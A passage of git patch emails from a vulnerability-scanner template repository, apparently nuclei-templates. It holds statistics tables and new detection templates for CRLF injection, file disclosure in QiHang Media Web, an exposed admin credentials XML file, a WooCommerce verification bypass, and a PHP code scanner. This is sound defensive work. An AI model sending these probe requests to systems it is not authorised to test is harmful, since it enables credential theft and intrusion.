soar | 1 | | | | | | | | | | avtech | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| phpshowtime | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| imap | 1 | | | | | | | | | -| lotus | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | | iptime | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | | mailchimp | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | | myvuehelp | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 06cc935227..33ad69d44e 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 803 | daffainfo | 280 | cves | 803 | info | 660 | http | 2067 | -| lfi | 325 | pikpikcu | 277 | vulnerabilities | 312 | high | 620 | file | 46 | +| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | | xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 199 | critical | 276 | dns | 12 | +| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | | wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | | exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 190 | pussycat0x | 70 | default-logins | 56 | | | | | +| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | | wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | | cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | From 93c2fafc77838525f15738ba11c5f9c4532c3269 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 Sep 2021 19:57:24 +0000 Subject: [PATCH 2662/4083] Auto README Update [Thu Sep 30 19:57:24 UTC 2021] :robot: --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 9eb520c555..1c489b9cdd 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 803 | daffainfo | 280 | cves | 803 | info | 660 | http | 2067 | -| lfi | 325 | pikpikcu | 277 | vulnerabilities | 312 | high | 620 | file | 46 | +| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | | xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 199 | critical | 276 | dns | 12 | +| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | | wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | | exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 190 | pussycat0x | 70 | default-logins | 56 | | | | | +| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | | wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | | cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | -**166 directories, 2230 files**. +**166 directories, 2231 files**. From 1c9238b972db54c8c25cbfe8614de936319f942d Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 1 Oct 2021 01:33:50 +0530 Subject: [PATCH 2663/4083] Rename CVE-2016-4975.yml to CVE-2016-4975.yaml --- cves/2016/{CVE-2016-4975.yml => CVE-2016-4975.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2016/{CVE-2016-4975.yml => CVE-2016-4975.yaml} (100%) diff --git a/cves/2016/CVE-2016-4975.yml b/cves/2016/CVE-2016-4975.yaml similarity index 100% rename from cves/2016/CVE-2016-4975.yml rename to cves/2016/CVE-2016-4975.yaml From 974493daaaddaa46f46754f8dfb62b653f4d2baa Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 1 Oct 2021 01:34:54 +0530 Subject: [PATCH 2664/4083] Update CVE-2016-4975.yaml --- cves/2016/CVE-2016-4975.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2016/CVE-2016-4975.yaml b/cves/2016/CVE-2016-4975.yaml index bdbee8848e..1bc031521f 100644 --- a/cves/2016/CVE-2016-4975.yaml +++ b/cves/2016/CVE-2016-4975.yaml @@ -17,7 +17,6 @@ requests: path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" - stop-at-first-match: true matchers: - type: regex regex: From 1bc4c2dffb4eddc66c1b30aaf34684cc1ea6e15e Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 17:16:15 -0400 Subject: [PATCH 2665/4083] add cve classification --- cves/2013/CVE-2013-7240.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml index 35cf6180ea..2b8df419a9 100644 --- a/cves/2013/CVE-2013-7240.yaml +++ b/cves/2013/CVE-2013-7240.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 tags: cve,cve2013,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2013-7240 + cwe-id: CWE-22 requests: - method: GET From aeba0ba1cd0d8f6580f0737eba4f37387a94121f Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 30 Sep 2021 17:43:42 -0500 Subject: [PATCH 2666/4083] Update php-scanner.yaml Fixed the GLOBALS matchers, so that a case like https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html wouldn't be missed. --- file/php/php-scanner.yaml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index f99892c6da..ade38b6482 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -105,15 +105,21 @@ file: regex: - 'import_request_variables' - type: regex - # Avoid use of $GLOBALS + # Avoid use of GLOBALS regex: - - '\\$GLOBALS' + - 'GLOBALS' - type: regex regex: - - '\\$_GET' + - '_GET' - type: regex regex: - - '\\$_POST' + - '_POST' + - type: regex + regex: + - '_COOKIE' + - type: regex + regex: + - '_SESSION' - type: regex # Ensure the use of type checking validating against booleans (===) regex: From 5028b76fb3e15504496c9ea780259d3de604c841 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 30 Sep 2021 17:51:17 -0500 Subject: [PATCH 2667/4083] Update php-scanner.yaml fixing more matchers --- file/php/php-scanner.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index ade38b6482..f71a88f80a 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -212,7 +212,7 @@ file: - type: regex # MySQLi Extension regex: - - "mysqli((_real)?_connect)?" + - "mysqli((_real)?_connect)?|_query" - type: regex # Oracle OCI8 DBMS regex: From 06e1e81f5e8f34f01a9589a5ea1b0a39a968120c Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 30 Sep 2021 17:58:15 -0500 Subject: [PATCH 2668/4083] Update php-scanner.yaml --- file/php/php-scanner.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index f71a88f80a..d802f82ce5 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -249,3 +249,10 @@ file: # XML document regex: - "x(ptr|path)_new_context" + - type: regex + # Investigate if GetTableFields is called safely + regex: + - "GetTableFields" + - type: regex + regex: + - "ini_get.*magic_quotes_gpc.*" From ae01477806a7126f2a7cf3fd63357977267cab9d Mon Sep 17 00:00:00 2001 From: Binit Ghimire Date: Fri, 1 Oct 2021 04:57:28 +0545 Subject: [PATCH 2669/4083] Create amazon-sns-topic.yaml --- file/keys/amazon-sns-topic.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 file/keys/amazon-sns-topic.yaml diff --git a/file/keys/amazon-sns-topic.yaml b/file/keys/amazon-sns-topic.yaml new file mode 100644 index 0000000000..b36e22c620 --- /dev/null +++ b/file/keys/amazon-sns-topic.yaml @@ -0,0 +1,17 @@ +id: amazon-sns-topic + +info: + name: Amazon SNS Topic Detect + author: TheBinitGhimire + severity: info + tags: file,token,amazon + +file: + - extensions: + - all + + extractors: + - type: regex + name: slack-bot-token-strings + regex: + - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' From 145f1a643db8525ebd66110c7089fdd0d100cbaf Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 30 Sep 2021 22:49:21 -0300 Subject: [PATCH 2670/4083] Update and rename wordpress-emails-verification-for-woocommerce.yaml to wp-woocommerce-email-verification.yaml - name changed to match template id. - added stop-at-first-match condition. --- ...ocommerce.yaml => wp-woocommerce-email-verification.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename vulnerabilities/wordpress/{wordpress-emails-verification-for-woocommerce.yaml => wp-woocommerce-email-verification.yaml} (93%) diff --git a/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml b/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml similarity index 93% rename from vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml rename to vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml index 0eebea0e10..136514ef96 100644 --- a/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml @@ -13,7 +13,8 @@ requests: path: - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -25,4 +26,4 @@ requests: status: - 401 - 403 - negative: true \ No newline at end of file + negative: true From 90138f44d1e655f06fc17dead5eafb1cb2e17c82 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 1 Oct 2021 15:35:12 +0900 Subject: [PATCH 2671/4083] Create qihang-media-web-lfi.yaml The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. Signed-off-by: GwanYeong Kim --- .../other/qihang-media-web-lfi.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 vulnerabilities/other/qihang-media-web-lfi.yaml diff --git a/vulnerabilities/other/qihang-media-web-lfi.yaml b/vulnerabilities/other/qihang-media-web-lfi.yaml new file mode 100644 index 0000000000..c05da3717f --- /dev/null +++ b/vulnerabilities/other/qihang-media-web-lfi.yaml @@ -0,0 +1,38 @@ +id: qihang-media-web-lfi + +info: + name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability + author: gy741 + severity: high + description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php + tags: qihang,lfi + +requests: + - raw: + - | + GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - "attachment" + - "application/zip" + part: header + condition: and + + - type: word + regex: + - "QH.aspx.cs" + - "QiHang.Media.Web.QH" + condition: and + + - type: status + status: + - 200 From f750bf5ba5e44d1fdd240f5d28adf7b10b6c48df Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 1 Oct 2021 15:42:48 +0900 Subject: [PATCH 2672/4083] Create qihang-media-web-credentials-disclosure.yaml The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. Signed-off-by: GwanYeong Kim --- ...hang-media-web-credentials-disclosure.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml diff --git a/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml b/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml new file mode 100644 index 0000000000..018107e323 --- /dev/null +++ b/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml @@ -0,0 +1,22 @@ +id: qihang-media-web-credentials-disclosure + +info: + name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure + author: gy741 + severity: critical + description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + tags: qihang,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/xml/User/User.xml" + + matchers: + - type: word + words: + - "User id" + - "account" + - "password" + condition: and From 0566c702ef8306e5afd41213609d25bd805e0a30 Mon Sep 17 00:00:00 2001 From: PR3R00T <50199640+PR3R00T@users.noreply.github.com> Date: Fri, 1 Oct 2021 08:40:33 +0100 Subject: [PATCH 2673/4083] Samba SWAT panel --- exposed-panels/samba-swat-panel.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 exposed-panels/samba-swat-panel.yaml diff --git a/exposed-panels/samba-swat-panel.yaml b/exposed-panels/samba-swat-panel.yaml new file mode 100644 index 0000000000..c99a46ff47 --- /dev/null +++ b/exposed-panels/samba-swat-panel.yaml @@ -0,0 +1,15 @@ +id: Samba SWAT panel +info: + name: samba-swat-panel + author: PR3R00T + severity: info +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}:901/" + matchers: + - type: word + words: + - 'Basic realm="SWAT"' + part: header From 8b4653b236c0b17738f432a7d7739a68840ec5b4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 1 Oct 2021 16:18:08 +0530 Subject: [PATCH 2674/4083] Update samba-swat-panel.yaml --- exposed-panels/samba-swat-panel.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/exposed-panels/samba-swat-panel.yaml b/exposed-panels/samba-swat-panel.yaml index c99a46ff47..b69bd29f52 100644 --- a/exposed-panels/samba-swat-panel.yaml +++ b/exposed-panels/samba-swat-panel.yaml @@ -1,13 +1,16 @@ -id: Samba SWAT panel +id: samba-swat-panel info: - name: samba-swat-panel + name: Samba SWAT panel author: PR3R00T severity: info + tags: panel + requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}:901/" + - 